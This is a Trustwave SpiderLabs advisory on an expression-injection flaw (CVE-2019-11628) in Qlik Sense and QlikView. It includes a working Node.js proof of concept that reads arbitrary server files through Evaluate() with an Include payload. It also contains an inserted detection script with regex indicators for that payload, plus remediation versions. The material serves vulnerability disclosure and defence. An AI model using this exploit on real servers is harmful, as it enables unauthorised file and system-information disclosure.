Trustwave SpiderLabs Security Advisory TWSL2019-004:
Expression Injection Vulnerability in Qlik Products

Published: 06/04/2019
Version: 1.0

Vendor: Qlik (https://www.qlik.com/)
Products: Qlik Sense Enterprise, QlikView Server, Qlik Analytics Platform
Versions affected:
  QlikView Server prior to 11.20 SR19, 12.00 (end of life), 12.10 SR11, 12.20 SR9, 12.30 SR2
  Qlik Sense Enterprise and Qlik Analytics Platform versions prior to February 2018 Patch 4, April 2018 Patch 3, June 2018 Patch 3, September 2018 Patch 4, November 2018 Patch 4, February 2019 Patch 2 and/or any 2017 version and prior.

Product description:
Qlik is an end-to-end data analytics platform.

Finding: Expression Injection
Credit: Olga Barinova of Trustwave
CVE: CVE-2019-11628

Description:
The Qlik Sense application allows the use of the 'Evaluate()' method via WebSockets. 'Evaluate()' is the method which executes the expression on the server and returns the result. An expression can be a simple arithmetic operation or a complex expression with system functions and system variables. Expression execution may lead to:
- arbitrary file read
- arbitrary DB file read
- system information disclosure
- server-side request forgery
- and other vulnerabilities

The following JS script connects to the application and sends the message with the payload to read the "C:/ProgramData/foo/readme.txt" file on the server.
$ cat qlikexploit.js
// Node.js proof of concept; depends on the 'websocket' and 'websocket-as-promised' packages.
const W3CWebSocket = require('websocket').w3cwebsocket
const WebSocket = require('websocket-as-promised')

// Expression handed to Evaluate(): the Include expansion reads the named file on the server.
let payload = `'$(Include="C:/ProgramData/foo/readme.txt")'`
let requestId = 0

async function main () {
  // Engine API endpoint of the target instance (a.b.c.d is a placeholder host).
  const ws = new WebSocket('wss://a.b.c.d/app/', {
    createWebSocket: url => new W3CWebSocket(url),
    packMessage: data => JSON.stringify(data),
    unpackMessage: message => JSON.parse(message),
    // Correlate JSON-RPC requests and responses by their 'id' field.
    attachRequestId: (data, requestId) => Object.assign({ id: requestId }, data),
    extractRequestId: data => data && data.id
  })

  // Send one JSON-RPC call to the engine. 'handle' selects the object the method acts on
  // (-1 is the global object; the opened document is handle 1 in this run). 'delta: true'
  // makes the engine answer with JSON patch operations, hence the op/path entries below.
  async function send (method, params, handle) {
    requestId++
    let message = await ws.sendRequest(
      { method, params, handle, delta: true, jsonrpc: 2.0 },
      { requestId }
    )
    if (message.error) throw new Error('Error calling method: ' + method + ' ' + message.error.message)
    return message.result
  }

  await ws.open()
  // List the available documents and open the first one.
  let result = await send('GetDocList', [], -1)
  console.log(result)
  let docId = result.qDocList[0].value[0].qDocId
  result = await send('OpenDoc', [docId, '', '', '', false], -1)
  console.log(result)
  // Evaluate the expression in the context of the opened document.
  result = await send('Evaluate', [payload], 1)
  console.log(result)
  console.log('\nExploit result: ' + result.qReturn[0].value)
  await ws.close()
}

main().catch(err => { console.error(err); process.exit(1) })

$ node qlikexploit.js
{ qDocList: [ { op: 'add', path: '/', value: [Array] } ] }
{ qReturn: [ { op: 'add', path: '/', value: [Object] } ] }
{ qReturn: [ { op: 'add', path: '/', value: 'This is the file contents in C:/ProgramData/foo/readme.txt\r\n' } ] }

Exploit result: This is the file contents in C:/ProgramData/foo/readme.txt

By changing the payload variable, it's possible to read all other files as well as some system information such as computer name, OS user, document path, etc.

Remediation Steps:
QlikView Server: Upgrade to the latest stable release or at least 11.20 SR19, 12.10 SR11, 12.20 SR9 or 12.30 SR2.
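An added detection example, not part of the advisory or Trustwave's code: it scans captured Engine API JSON-RPC frames for Evaluate requests whose expression carries the Include expansion used in the proof of concept above or the system-information functions the advisory refers to. The one-frame-per-line capture layout, the indicator names and the sample frames are constructed assumptions.

```javascript
// Added example (not from the advisory): flag Engine API "Evaluate" requests
// carrying the indicators this advisory describes. Input is assumed to be one
// JSON-RPC frame per line, as a WebSocket-inspecting proxy might record it;
// that layout is an assumption, not a Qlik log format.

// Indicators: the dollar-sign Include expansion (pulls a server file into the
// expression) and the system-information functions the advisory alludes to.
const INDICATORS = [
  { name: 'file-include', re: /\$\(\s*Include\s*=/i },
  { name: 'system-info', re: /\b(ComputerName|OSUser|DocumentPath)\s*\(/i },
];

// Parse one frame; returns null for non-JSON lines and non-Evaluate calls,
// otherwise { id, handle, expression, hits } with the matched indicator names.
function inspectFrame(line) {
  let msg;
  try { msg = JSON.parse(line); } catch (e) { return null; }
  if (!msg || msg.method !== 'Evaluate') return null;
  // The Engine API takes params positionally ([expr]) or by name ({qExpression}).
  const p = msg.params;
  const expr = Array.isArray(p) ? p[0] : (p && p.qExpression);
  if (typeof expr !== 'string') return null;
  const hits = INDICATORS.filter(i => i.re.test(expr)).map(i => i.name);
  return { id: msg.id, handle: msg.handle, expression: expr, hits };
}

// Scan a whole capture and keep only the Evaluate calls that matched an indicator.
function scanLog(text) {
  return text.split('\n').map(inspectFrame).filter(f => f && f.hits.length > 0);
}

// Constructed sample capture: a benign arithmetic Evaluate, an OpenDoc call,
// an Evaluate with the Include expansion from the proof of concept, and a junk line.
const SAMPLE_LOG = [
  { jsonrpc: '2.0', id: 3, method: 'Evaluate', handle: 1, params: ['Sum(Sales) * 1.2'] },
  { jsonrpc: '2.0', id: 2, method: 'OpenDoc', handle: -1, params: ['doc-id-placeholder'] },
  { jsonrpc: '2.0', id: 4, method: 'Evaluate', handle: 1,
    params: { qExpression: '\'$(Include="C:/ProgramData/foo/readme.txt")\'' } },
].map(o => JSON.stringify(o)).concat(['not a json line']).join('\n');

for (const f of scanLog(SAMPLE_LOG)) {
  console.log(`ALERT id=${f.id} handle=${f.handle} hits=${f.hits.join(',')} expr=${f.expression}`);
}
```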
Qlik Sense Enterprise / Qlik Analytics Platform: Upgrade to the latest stable release or at least February 2018 Patch 4, April 2018 Patch 3, June 2018 Patch 3, September 2018 Patch 4, November 2018 Patch 4 or February 2019 Patch 2.

Revision History:
03/20/2019 - Vulnerability disclosed to vendor
04/16/2019 - Patch released by vendor
06/04/2019 - Advisory published

References:
1. https://qliksupport.force.com/articles/000069985

About Trustwave:
Trustwave helps businesses fight cybercrime, protect data and reduce security risk. With cloud and managed security services, integrated technologies and a team of security experts, ethical hackers and researchers, Trustwave enables businesses to transform the way they manage their information security and compliance programs. More than three million businesses are enrolled in the Trustwave TrustKeeper® cloud platform, through which Trustwave delivers automated, efficient and cost-effective threat, vulnerability and compliance management. Trustwave is headquartered in Chicago, with customers in 96 countries. For more information about Trustwave, visit https://www.trustwave.com.

About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs

Disclaimer:
The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose.
In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.